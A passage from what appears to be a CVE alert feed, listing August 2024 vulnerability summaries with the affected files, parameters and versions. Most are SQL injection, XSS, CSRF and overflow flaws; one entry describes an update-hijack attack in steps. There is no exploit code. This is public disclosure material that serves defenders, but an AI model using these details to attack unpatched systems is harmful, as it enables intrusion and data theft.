allocating a ctrlleading up to this race window.🎖@cveNotify |
|
| 2024-08-09 14:37:31 |
🚨 CVE-2024-7364A vulnerability has been found in SourceCodester Tracking Monitoring Management System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /manage_records.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273343.🎖@cveNotify |
|
| 2024-08-09 14:37:30 |
🚨 CVE-2024-7363A vulnerability, which was classified as critical, was found in SourceCodester Tracking Monitoring Management System 1.0. Affected is an unknown function of the file /manage_person.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-273342 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-09 14:37:26 |
🚨 CVE-2024-7361A vulnerability classified as critical was found in SourceCodester Tracking Monitoring Management System 1.0. This vulnerability affects unknown code of the file /ajax.php?action=save_establishment. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273340.🎖@cveNotify |
|
| 2024-08-09 14:37:25 |
🚨 CVE-2024-7359A vulnerability was found in SourceCodester Tracking Monitoring Management System 1.0. It has been rated as problematic. Affected by this issue is some unknown functionality of the file /ajax.php?action=save_establishment. The manipulation of the argument name leads to cross site scripting. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-273338 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-09 14:37:24 |
🚨 CVE-2024-7337A vulnerability, which was classified as critical, has been found in TOTOLINK EX1200L 9.3.5u.6146_B20201023. Affected by this issue is the function loginauth of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument http_host leads to buffer overflow. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273260. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-09 13:37:26 |
🚨 CVE-2024-32503An issue was discovered in Samsung Mobile Processor and Wearable Processor Exynos 850, Exynos 1080, Exynos 2100, Exynos 1280, Exynos 1380, Exynos 1330, Exynos W920, Exynos W930. The mobile processor lacks proper memory deallocation checking, which can result in a UAF (Use-After-Free) vulnerability.🎖@cveNotify |
|
| 2024-08-09 13:37:25 |
🚨 CVE-2024-5507Luxion KeyShot Viewer KSP File Parsing Stack-based Buffer Overflow Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of KSP files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a stack-based buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22266.🎖@cveNotify |
|
| 2024-08-09 13:37:24 |
🚨 CVE-2024-5506Luxion KeyShot Viewer KSP File Parsing Out-Of-Bounds Write Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Luxion KeyShot Viewer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of KSP files. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-22514.🎖@cveNotify |
|
| 2024-08-09 11:37:32 |
🚨 CVE-2024-7378A vulnerability was found in SourceCodester Simple Realtime Quiz System 1.0 and classified as critical. Affected by this issue is some unknown functionality of the file /manage_question.php. The manipulation of the argument id leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-273362 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-09 11:37:26 |
🚨 CVE-2024-7377A vulnerability has been found in SourceCodester Simple Realtime Quiz System 1.0 and classified as critical. Affected by this vulnerability is an unknown functionality of the file /view_result.php. The manipulation of the argument qid leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273361 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-09 11:37:25 |
🚨 CVE-2024-7374A vulnerability classified as critical was found in SourceCodester Simple Realtime Quiz System 1.0. This vulnerability affects unknown code of the file /manage_user.php. The manipulation of the argument id leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. VDB-273358 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-09 11:37:24 |
🚨 CVE-2024-7367A vulnerability, which was classified as problematic, was found in SourceCodester Simple Realtime Quiz System 1.0. This affects an unknown part of the file /ajax.php?action=save_user. The manipulation leads to cross-site request forgery. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-273351.🎖@cveNotify |
|
| 2024-08-08 22:37:24 |
🚨 CVE-2024-22398An improper Limitation of a Pathname to a Restricted Directory (Path Traversal) vulnerability in SonicWall Email Security Appliance could allow a remote attacker with administrative privileges to conduct a directory traversal attack and delete arbitrary files from the appliance file system.🎖@cveNotify |
|
| 2024-08-08 21:37:25 |
🚨 CVE-2024-27689Stupid Simple CMS v1.2.4 was discovered to contain a Cross-Site Request Forgery (CSRF) via /update-article.php.🎖@cveNotify |
|
| 2024-08-08 21:37:24 |
🚨 CVE-2024-0855The Spiffy Calendar WordPress plugin before 4.9.9 doesn't check the event_author parameter, and allows any user to alter it when creating an event, leading to deceiving users/admins that a page was created by a Contributor+.🎖@cveNotify |
|
| 2024-08-08 20:07:25 |
🚨 CVE-2024-6896The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.0.96.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.🎖@cveNotify |
|
| 2024-08-08 20:07:24 |
🚨 CVE-2024-6930The WP Booking Calendar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'type' attribute within the plugin's bookingform shortcode in all versions up to, and including, 10.2.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-08 19:37:25 |
🚨 CVE-2023-48902An issue was discovered in tramyardg autoexpress version 1.3.0, allows unauthenticated remote attackers to escalate privileges, update car data, delete vehicles, and upload car images via authentication bypass in uploadCarImages.php.🎖@cveNotify |
|
| 2024-08-08 19:37:24 |
🚨 CVE-2024-24307Path Traversal vulnerability in Tunis Soft "Product Designer" (productdesigner) module for PrestaShop before version 1.178.36, allows a remote attacker to escalate privileges and obtain sensitive information via the ajaxProcessCropImage() method.🎖@cveNotify |
|
| 2024-08-08 19:07:32 |
🚨 CVE-2024-37320SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-08 19:07:26 |
🚨 CVE-2024-37319SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-08 19:07:25 |
🚨 CVE-2024-21449SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-08 19:07:24 |
🚨 CVE-2024-20701SQL Server Native Client OLE DB Provider Remote Code Execution Vulnerability🎖@cveNotify |
|
| 2024-08-08 18:37:24 |
🚨 CVE-2019-20471An issue was discovered on TK-Star Q90 Junior GPS horloge 3.1042.9.8656 devices. When using the device at initial setup, a default password is used (123456) for administrative purposes. There is no prompt to change this password. Note that this password can be used in combination with CVE-2019-20470.🎖@cveNotify |
|
| 2024-08-08 17:07:25 |
🚨 CVE-2024-38301Dell Alienware Command Center, version 5.7.3.0 and prior, contains an improper access control vulnerability. A low privileged attacker could potentially exploit this vulnerability, leading to denial of service on the local system and information disclosure.🎖@cveNotify |
|
| 2024-08-08 17:07:24 |
🚨 CVE-2024-37884Nextcloud Server is a self hosted personal cloud system. A malicious user was able to send delete requests for old versions of files they only got shared with read permissions. It is recommended that the Nextcloud Server is upgraded to 26.0.12 or 27.1.7 or 28.0.3 and that the Nextcloud Enterprise Server is upgraded to 26.0.12 or 27.1.7 or 28.0.3.🎖@cveNotify |
|
| 2024-08-08 16:37:30 |
🚨 CVE-2024-22633Setor Informatica Sistema Inteligente para Laboratorios (S.I.L.) 388 was discovered to contain a remote code execution (RCE) vulnerability via the hprinter parameter. This vulnerability is triggered via a crafted POST request.🎖@cveNotify |
|
| 2024-08-08 16:37:26 |
🚨 CVE-2024-30923SQL Injection vulnerability in DerbyNet v9.0 and below allows a remote attacker to execute arbitrary code via the where Clause in Racer Document Rendering🎖@cveNotify |
|
| 2024-08-08 16:37:25 |
🚨 CVE-2023-50702Sikka SSCWindowsService 5 2023-09-14 executes a program as LocalSystem but allows full control by low-privileged users (and low-privileged users have write access to %PROGRAMDATA%\SSCService). Consequently, low-privileged users can execute arbitrary code as LocalSystem.🎖@cveNotify |
|
| 2024-08-08 16:37:24 |
🚨 CVE-2024-27765Directory Traversal vulnerability in Jeewms v.3.7 and before allows a remote attacker to obtain sensitive information via the cgformTemplateController component.🎖@cveNotify |
|
| 2024-08-08 16:07:26 |
🚨 CVE-2024-40898SSRF in Apache HTTP Server on Windows with mod_rewrite in server/vhost context, allows to potentially leak NTML hashes to a malicious server via SSRF and malicious requests.Users are recommended to upgrade to version 2.4.62 which fixes this issue.🎖@cveNotify |
|
| 2024-08-08 16:07:25 |
🚨 CVE-2024-6066A vulnerability classified as critical has been found in SourceCodester Best House Rental Management System 1.0. Affected is an unknown function of the file payment_report.php. The manipulation of the argument month_of leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-268794 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-08 16:07:24 |
🚨 CVE-2024-36597Aegon Life v1.0 was discovered to contain a SQL injection vulnerability via the client_id parameter at clientStatus.php.🎖@cveNotify |
|
| 2024-08-08 15:37:31 |
🚨 CVE-2024-35579Tenda AX1806 v1.0.0.1 contains a stack overflow via the iptv.city.vlan parameter in the function formSetIptv.🎖@cveNotify |
|
| 2024-08-08 15:37:30 |
🚨 CVE-2024-34949SQL injection vulnerability in Likeshop before 2.5.7 allows attackers to run abitrary SQL commands via the function OrderLogic::getOrderList function, exploited at the /admin/order/lists.html endpoint.🎖@cveNotify |
|
| 2024-08-08 15:37:26 |
🚨 CVE-2024-21823Hardware logic with insecure de-synchronization in Intel(R) DSA and Intel(R) IAA for some Intel(R) 4th or 5th generation Xeon(R) processors may allow an authorized user to potentially enable denial of service via local access.🎖@cveNotify |
|
| 2024-08-08 15:37:25 |
🚨 CVE-2024-29209A medium severity vulnerability has been identified in the update mechanism of the Phish Alert Button for Outlook, which could allow an attacker to remotely execute arbitrary code on the host machine. The vulnerability arises from the application's failure to securely verify the authenticity and integrity of the update server.The application periodically checks for updates by querying a specific URL. However, this process does not enforce strict SSL/TLS verification, nor does it validate the digital signature of the received update files. An attacker with the capability to perform DNS spoofing can exploit this weakness. By manipulating DNS responses, the attacker can redirect the application's update requests to a malicious server under their control.Once the application queries the spoofed update URL, the malicious server can respond with a crafted update package. Since the application fails to properly verify the authenticity of the update file, it will accept and execute the package, leading to arbitrary code execution on the host machine.Impact:Successful exploitation of this vulnerability allows an attacker to execute code with elevated privileges, potentially leading to data theft, installation of further malware, or other malicious activities on the host system.Affected Products:Phish Alert Button (PAB) for Outlook versions 1.10.0-1.10.11Second Chance Client versions 2.0.0-2.0.9PIQ Client versions 1.0.0-1.0.15Remediation:Automated updates will be pushed to address this issue. Users of affected versions should verify the latest version is applied and, if not, apply the latest updates provided by KnowBe4, which addresses this vulnerability by implementing proper SSL/TLS checks of the update server. It is also recommended to ensure DNS settings are secure to prevent DNS spoofing attacks.Workarounds:Use secure corporate networks or VPN services to secure network communications, which can help mitigate the risk of DNS spoofing.Credits:This vulnerability was discovered by Ceri Coburn at Pen Test Partners, who reported it responsibly to the vendor.🎖@cveNotify |
|
| 2024-08-08 15:07:37 |
🚨 CVE-2024-41432An IP Spoofing vulnerability has been discovered in Likeshop up to 2.5.7.20210811. This issue allows an attacker to replace their real IP address with any arbitrary IP address, specifically by adding a forged 'X-Forwarded' or 'Client-IP' header to requests. Exploiting IP spoofing, attackers can bypass account lockout mechanisms during attempts to log into admin accounts, spoof IP addresses in requests sent to the server, and impersonate IP addresses that have logged into user accounts, etc.🎖@cveNotify |
|
| 2024-08-08 15:07:36 |
🚨 CVE-2024-41308An issue in the Ping feature of IT Solutions Enjay CRM OS v1.0 allows attackers to escape the restricted terminal environment and gain root-level privileges on the underlying system.🎖@cveNotify |
|
| 2024-08-08 15:07:32 |
🚨 CVE-2024-41251An Incorrect Access Control vulnerability was found in /smsa/admin_teacher_register_approval.php and /smsa/admin_teacher_register_approval_submit.php in Kashipara Responsive School Management System v3.2.0, which allows remote unauthenticated attackers to view and approve Teacher registration.🎖@cveNotify |
|
| 2024-08-08 15:07:31 |
🚨 CVE-2024-42155In the Linux kernel, the following vulnerability has been resolved:s390/pkey: Wipe copies of protected- and secure-keysAlthough the clear-key of neither protected- nor secure-keys isaccessible, this key material should only be visible to the callingprocess. So wipe all copies of protected- or secure-keys from stack,even in case of an error.🎖@cveNotify |
|
| 2024-08-08 15:07:30 |
🚨 CVE-2024-42154In the Linux kernel, the following vulnerability has been resolved:tcp_metrics: validate source addr lengthI don't see anything checking that TCP_METRICS_ATTR_SADDR_IPV4is at least 4 bytes long, and the policy doesn't have an entryfor this attribute at all (neither does it for IPv6 but v6 ismanually validated).🎖@cveNotify |
|
| 2024-08-08 15:07:27 |
🚨 CVE-2024-37085VMware ESXi contains an authentication bypass vulnerability. A malicious actor with sufficient Active Directory (AD) permissions can gain full access to an ESXi host that was previously configured to use AD for user management https://blogs.vmware.com/vsphere/2012/09/joining-vsphere-hosts-to-active-directory.html by re-creating the configured AD group ('ESXi Admins' by default) after it was deleted from AD.🎖@cveNotify |
|
| 2024-08-08 15:07:26 |
🚨 CVE-2024-38428url.c in GNU Wget through 1.24.5 mishandles semicolons in the userinfo subcomponent of a URI, and thus there may be insecure behavior in which data that was supposed to be in the userinfo subcomponent is misinterpreted to be part of the host subcomponent.🎖@cveNotify |
|
| 2024-08-08 15:07:25 |
🚨 CVE-2024-36971In the Linux kernel, the following vulnerability has been resolved:net: fix __dst_negative_advice() race__dst_negative_advice() does not enforce proper RCU rules whensk->dst_cache must be cleared, leading to possible UAF.RCU rules are that we must first clear sk->sk_dst_cache,then call dst_release(old_dst).Note that sk_dst_reset(sk) is implementing this protocol correctly,while __dst_negative_advice() uses the wrong order.Given that ip6_negative_advice() has special logicagainst RTF_CACHE, this means each of the three ->negative_advice()existing methods must perform the sk_dst_reset() themselves.Note the check against NULL dst is centralized in__dst_negative_advice(), there is no need to duplicateit in various callbacks.Many thanks to Clement Lecigne for tracking this issue.This old bug became visible after the blamed commit, using UDP sockets.🎖@cveNotify |
|
| 2024-08-08 15:07:24 |
🚨 CVE-2018-0824A remote code execution vulnerability exists in "Microsoft COM for Windows" when it fails to properly handle serialized objects, aka "Microsoft COM for Windows Remote Code Execution Vulnerability." This affects Windows 7, Windows Server 2012 R2, Windows RT 8.1, Windows Server 2008, Windows Server 2012, Windows 8.1, Windows Server 2016, Windows Server 2008 R2, Windows 10, Windows 10 Servers.🎖@cveNotify |
|
| 2024-08-08 14:37:43 |
🚨 CVE-2024-41237A SQL injection vulnerability in /smsa/teacher_login.php in Kashipara Responsive School Management System v1.0 allows an attacker to execute arbitrary SQL commands via the "username" parameter.🎖@cveNotify |
|
| 2024-08-08 14:37:42 |
🚨 CVE-2024-41244An Incorrect Access Control vulnerability was found in /smsa/view_class.php in Kashipara Responsive School Management System v3.2.0, which allows remote unauthenticated attackers to view CLASS details.🎖@cveNotify |
|
| 2024-08-08 14:37:41 |
🚨 CVE-2024-422181Password 8 before 8.10.38 for macOS allows local attackers to exfiltrate vault items by bypassing macOS-specific security mechanisms.🎖@cveNotify |
|
| 2024-08-08 14:37:38 |
🚨 CVE-2024-41226A CSV injection vulnerability in Automation Anywhere Automation 360 version 21094 allows attackers to execute arbitrary code via a crafted payload.🎖@cveNotify |
|
| 2024-08-08 14:37:37 |
🚨 CVE-2024-39011Prototype Pollution in chargeover redoc v2.0.9-rc.69 allows attackers to execute arbitrary code or cause a Denial of Service (DoS) and cause other impacts via the function mergeObjects.🎖@cveNotify |
|
| 2024-08-08 14:07:31 |
🚨 CVE-2024-7284A vulnerability, which was classified as problematic, was found in SourceCodester Lot Reservation Management System 1.0. This affects an unknown part of the file /admin/ajax.php?action=save_settings. The manipulation of the argument about leads to cross site scripting. It is possible to initiate the attack remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-273153 was assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-08 14:07:30 |
🚨 CVE-2024-7281A vulnerability classified as critical has been found in SourceCodester Lot Reservation Management System 1.0. Affected is an unknown function of the file /admin/index.php?page=manage_lot. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-273150 is the identifier assigned to this vulnerability.🎖@cveNotify |
|
| 2024-08-08 14:07:26 |
🚨 CVE-2024-7279A vulnerability was found in SourceCodester Lot Reservation Management System 1.0. It has been declared as critical. This vulnerability affects unknown code of the file /admin/ajax.php?action=login. The manipulation of the argument username leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-273148.🎖@cveNotify |
|
| 2024-08-08 14:07:25 |
🚨 CVE-2024-39012ais-ltd strategyen v0.4.0 was discovered to contain a prototype pollution via the function mergeObjects. This vulnerability allows attackers to execute arbitrary code or cause a Denial of Service (DoS) via injecting arbitrary properties.🎖@cveNotify |
|
| 2024-08-08 14:07:24 |
🚨 CVE-2024-32113Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in Apache OFBiz.This issue affects Apache OFBiz: before 18.12.13.Users are recommended to upgrade to version 18.12.13, which fixes the issue.🎖@cveNotify |
|
| 2024-08-08 13:37:25 |
🚨 CVE-2024-7348Time-of-check Time-of-use (TOCTOU) race condition in pg_dump in PostgreSQL allows an object creator to execute arbitrary SQL functions as the user running pg_dump, which is often a superuser. The attack involves replacing another relation type with a view or foreign table. The attack requires waiting for pg_dump to start, but winning the race condition is trivial if the attacker retains an open transaction. Versions before PostgreSQL 16.4, 15.8, 14.13, 13.16, and 12.20 are affected.🎖@cveNotify |
|
| 2024-08-08 13:37:24 |
🚨 CVE-2024-3659Firmware in KAON AR2140 routers prior to version 4.2.16 is vulnerable to a shell command injection via sending a crafted request to one of the endpoints.In order to exploit this vulnerability, one has to have access to the administrative portal of the router.🎖@cveNotify |
|
| 2024-08-08 13:07:36 |
🚨 CVE-2024-6892Attackers can craft a malicious link that once clicked will execute arbitrary JavaScript in the context of the Journyx web application.🎖@cveNotify |
|
| 2024-08-08 13:07:35 |
🚨 CVE-2024-6891Attackers with a valid username and password can exploit a python code injection vulnerability during the natural login flow.🎖@cveNotify |
|
| 2024-08-08 13:07:32 |
🚨 CVE-2024-6890Password reset tokens are generated using an insecure source of randomness. Attackers who know the username of the Journyx installation user can bruteforce the password reset and change the administrator password.🎖@cveNotify |
|
| 2024-08-08 13:07:31 |
🚨 CVE-2024-6706Attackers can craft a malicious prompt that coerces the language model into executing arbitrary JavaScript in the context of the web page.🎖@cveNotify |
|
| 2024-08-08 13:07:30 |
🚨 CVE-2024-41239A Stored Cross Site Scripting (XSS) vulnerability was found in "/smsa/add_class_submit.php" in Kashipara Responsive School Management System v1.0, which allows remote attackers to execute arbitrary code via "class_name" parameter field.🎖@cveNotify |
|
| 2024-08-08 13:07:27 |
🚨 CVE-2024-41237A SQL injection vulnerability in /smsa/teacher_login.php in Kashipara Responsive School Management System v1.0 allows an attacker to execute arbitrary SQL commands via the "username" parameter.🎖@cveNotify |
|
| 2024-08-08 13:07:26 |
🚨 CVE-2024-7171A vulnerability classified as critical has been found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. Affected is the function NTPSyncWithHost of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument hostTime leads to os command injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272592. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-08 13:07:25 |
🚨 CVE-2024-7154A vulnerability, which was classified as problematic, was found in TOTOLINK A3700R 9.1.2u.5822_B20200513. Affected is an unknown function of the file /wizard.html of the component Password Reset Handler. The manipulation leads to improper access controls. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-272568. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-08 12:37:28 |
🚨 CVE-2024-7159A vulnerability was found in TOTOLINK A3600R 4.1.2cu.5182_B20201102. It has been rated as critical. This issue affects some unknown processing of the file /web_cste/cgi-bin/product.ini of the component Telnet Service. The manipulation leads to use of hard-coded password. The exploit has been disclosed to the public and may be used. The identifier VDB-272573 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-08 12:37:27 |
🚨 CVE-2024-7156A vulnerability was found in TOTOLINK A3700R 9.1.2u.5822_B20200513 and classified as problematic. Affected by this issue is some unknown functionality of the file /cgi-bin/ExportSettings.sh of the component apmib Configuration Handler. The manipulation leads to information disclosure. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. VDB-272570 is the identifier assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-08 12:37:26 |
🚨 CVE-2024-7155A vulnerability has been found in TOTOLINK A3300R 17.0.0cu.557_B20221024 and classified as problematic. Affected by this vulnerability is an unknown functionality of the file /etc/shadow.sample. The manipulation leads to use of hard-coded password. It is possible to launch the attack on the local host. The complexity of an attack is rather high. The exploitation appears to be difficult. The exploit has been disclosed to the public and may be used. The identifier VDB-272569 was assigned to this vulnerability. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-08-08 12:07:25 |
🚨 CVE-2022-46973Report v0.9.8.6 was discovered to contain a Server-Side Request Forgery (SSRF) vulnerability.🎖@cveNotify |
|
| 2024-08-08 12:07:24 |
🚨 CVE-2022-42983anji-plus AJ-Report 0.9.8.6 allows remote attackers to bypass login authentication by spoofing JWT Tokens.🎖@cveNotify |
|
| 2024-08-08 11:37:32 |
🚨 CVE-2024-5423Multiple Denial of Service (DoS) conditions has been discovered in GitLab CE/EE affecting all versions starting from 1.0 prior to 17.0.6, starting from 17.1 prior to 17.1.4, and starting from 17.2 prior to 17.2.2 which allowed an attacker to cause resource exhaustion via banzai pipeline.🎖@cveNotify |
|
| 2024-08-08 11:37:26 |
🚨 CVE-2024-4207A cross-site scripting issue has been discovered in GitLab affecting all versions starting from 5.1 prior 17.0.6, starting from 17.1 prior to 17.1.4, and starting from 17.2 prior to 17.2.2. When viewing an XML file in a repository in raw mode, it can be made to render as HTML if viewed under specific circumstances.🎖@cveNotify |
|
| 2024-08-08 11:37:25 |
🚨 CVE-2024-3035A permission check vulnerability in GitLab CE/EE affecting all versions starting from 8.12 prior to 17.0.6, 17.1 prior to 17.1.4, and 17.2 prior to 17.2.2 allowed for LFS tokens to read and write to the user owned repositories.🎖@cveNotify |
|
| 2024-08-08 11:37:24 |
🚨 CVE-2024-2800ReDoS flaw in RefMatcher when matching branch names using wildcards in GitLab EE/CE affecting all versions from 11.3 prior to 17.0.6, 17.1 prior to 17.1.4, and 17.2 prior to 17.2.2 allows denial of service via Regex backtracking.🎖@cveNotify |
|
| 2024-08-08 10:37:25 |
🚨 CVE-2024-38206An authenticated attacker can bypass Server-Side Request Forgery (SSRF) protection in Microsoft Copilot Studio to leak sensitive information over a network.🎖@cveNotify |
|
| 2024-08-08 10:37:24 |
🚨 CVE-2024-38166An unauthenticated attacker can exploit improper neutralization of input during web page generation in Microsoft Dynamics 365 to spoof over a network by tricking a user to click on a link.🎖@cveNotify |
|
| 2024-08-08 09:37:26 |
🚨 CVE-2024-42032Access permission verification vulnerability in the Contacts moduleImpact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-08-08 09:37:25 |
🚨 CVE-2024-42031Access permission verification vulnerability in the Settings module.Impact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-08-08 09:37:24 |
🚨 CVE-2024-42030Access permission verification vulnerability in the content sharing pop-up moduleImpact: Successful exploitation of this vulnerability may affect service confidentiality.🎖@cveNotify |
|
| 2024-08-08 08:37:24 |
🚨 CVE-2023-7265Permission verification vulnerability in the lock screen moduleImpact: Successful exploitation of this vulnerability may affect availability🎖@cveNotify |
|
| 2024-08-08 06:37:32 |
🚨 CVE-2024-7548The LearnPress – WordPress LMS Plugin plugin for WordPress is vulnerable to time-based SQL Injection via the 'order' parameter in all versions up to, and including, 4.2.6.9.3 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-08-08 06:37:26 |
🚨 CVE-2024-7150The Slider by 10Web – Responsive Image Slider plugin for WordPress is vulnerable to time-based SQL Injection via the 'id' parameter in all versions up to, and including, 1.2.57 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with Contributor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.🎖@cveNotify |
|
| 2024-08-08 06:37:25 |
🚨 CVE-2024-6481The Search & Filter Pro WordPress plugin before 2.5.18 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)🎖@cveNotify |
|
| 2024-08-08 06:37:24 |
🚨 CVE-2024-5226The Fuse Social Floating Sidebar plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the file upload functionality in all versions up to, and including, 5.4.10 due to insufficient validation of SVG files. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-08-08 05:37:32 |
🚨 CVE-2024-6987The Orchid Store theme for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'orchid_store_activate_plugin' function in all versions up to, and including, 1.5.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to activate the Addonify Floating Cart For WooCommerce plugin if it is installed.🎖@cveNotify |
|
| 2024-08-08 05:37:26 |
🚨 CVE-2024-6869The Falang multilanguage for WordPress plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on several functions in all versions up to, and including, 1.3.52. This makes it possible for authenticated attackers, with Subscriber-level access and above, to update and delete translations and expose the administrator email address.🎖@cveNotify |
|
| 2024-08-08 05:37:25 |
🚨 CVE-2001-1519RunAs (runas.exe) in Windows 2000 allows local users to create a spoofed named pipe when the service is stopped, then capture cleartext usernames and passwords when clients connect to the service. NOTE: the vendor disputes this issue, saying that administrative privileges are already required to exploit it🎖@cveNotify |
|
| 2024-08-08 05:37:24 |
🚨 CVE-2001-1517RunAs (runas.exe) in Windows 2000 stores cleartext authentication information in memory, which could allow attackers to obtain usernames and passwords by executing a process that is allocated the same memory page after termination of a RunAs command. NOTE: the vendor disputes this issue, saying that administrative privileges are already required to exploit it, and the original researcher did not respond to requests for additional information🎖@cveNotify |
|
| 2024-08-08 04:37:32 |
🚨 CVE-2024-6254The Brizy – Page Builder plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.5.1. This is due to missing or incorrect nonce validation on form submissions. This makes it possible for unauthenticated attackers to submit forms intended for public use as another user via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. On sites where unfiltered_html is enabled, this can lead to the admin unknowingly adding a Stored Cross-Site Scripting payload.🎖@cveNotify |
|
| 2024-08-08 04:37:26 |
🚨 CVE-2002-2379Cisco AS5350 IOS 12.2(11)T with access control lists (ACLs) applied and possibly with ssh running allows remote attackers to cause a denial of service (crash) via a port scan, possibly due to an ssh bug. NOTE: this issue could not be reproduced by the vendor🎖@cveNotify |
|
| 2024-08-08 04:37:25 |
🚨 CVE-2002-1774NOTE: this issue has been disputed by the vendor. Symantec Norton AntiVirus 2002 allows remote attackers to send viruses that bypass the e-mail scanning via a NULL character in the MIME header before the virus. NOTE: the vendor has disputed this issue, acknowledging that the initial scan is bypassed, but the AutoProtect feature would detect the virus before it is executed🎖@cveNotify |
|
| 2024-08-08 03:37:32 |
🚨 CVE-2024-7492The MainWP Child Reports plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 2.2. This is due to missing or incorrect nonce validation on the network_options_action() function. This makes it possible for unauthenticated attackers to update arbitrary options that can be leveraged for privilege escalation via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. This is only exploitable on multisite instances.🎖@cveNotify |
|
| 2024-08-08 03:37:26 |
🚨 CVE-2024-7350The Appointment Booking Calendar Plugin and Online Scheduling Plugin – BookingPress plugin for WordPress is vulnerable to authentication bypass in versions 1.1.6 to 1.1.7. This is due to the plugin not properly verifying a user's identity prior to logging them in when completing a booking. This makes it possible for unauthenticated attackers to log in as registered users, including administrators, if they have access to that user's email. This is only exploitable when the 'Auto login user after successful booking' setting is enabled.🎖@cveNotify |
|
| 2024-08-08 03:37:25 |
